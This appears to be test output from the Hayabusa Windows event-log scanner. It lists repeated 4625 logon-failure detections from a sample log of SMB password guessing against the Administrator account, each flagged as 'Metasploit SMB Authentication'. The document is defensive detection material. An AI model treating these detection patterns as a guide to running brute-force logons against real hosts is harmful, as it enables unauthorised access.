+2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tCzVponBvb9mbyIr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mSwnrFv90KjN2cqj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QX5TLs2MPkia1cmk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ammLKlG1Q5awQGvN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SJ1ijJjPJbF4uFlo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mZOLnwIzpGz03Yjh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xS8U3UQNz6l0LZn0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: no6cftQ5MF1fjZ0y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5WHS6jVRnCUH0Rb5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i3oGLwrCJXJOauf6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I1sxPrDYV3rr4pGJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Osysh2O2A3A2bN22  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FsInW9EMJZU8FOrF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ge8do8TM4GG1atMx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4w5GLbpVsAhGqCiq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8eQXeW1VpRU0ptMs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NhLosoA2parzTnW9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MCFTP4gVGEKFKuRI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ALrDwJz2cta9fcXB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZZNXGw28osMQLjub  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4wQzvMnwYuEQRO7V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UloOAIgGuj6NecfR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cVSeLo2PRgGmf83Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SaCFO8CPFLuERugV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QCwV1D4L5BDZSriK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QPhLQsM4R2ua4SxW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fwgp52JNi7xnTxpN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j2GutBDenjweAluz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wflcgg5ebqu8hHGL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jXaaYSU2pakw6IsK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BfJnBv3eA8wZttML  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kOXSI0jPfbvW4dAg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8JW6aX5mNz7cETsl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NVuJLXJzlVnDLT4Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WtSwhwnApnPI9AkO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1peOkjbd1WXGEAAM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Tbw3V9MtLIcxr65R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CEZ2v1f6t0luDj4D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R0omMppAFlFhE1mG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0jMvVN9eSeGW3zcN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HnFNYabbO7IpbVku  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8KtyTTNdqVikZGYY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DCChjnFv2hMXXwgW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FvIYRZSomaJYJOH5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FEirUFRscaOwTuAg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
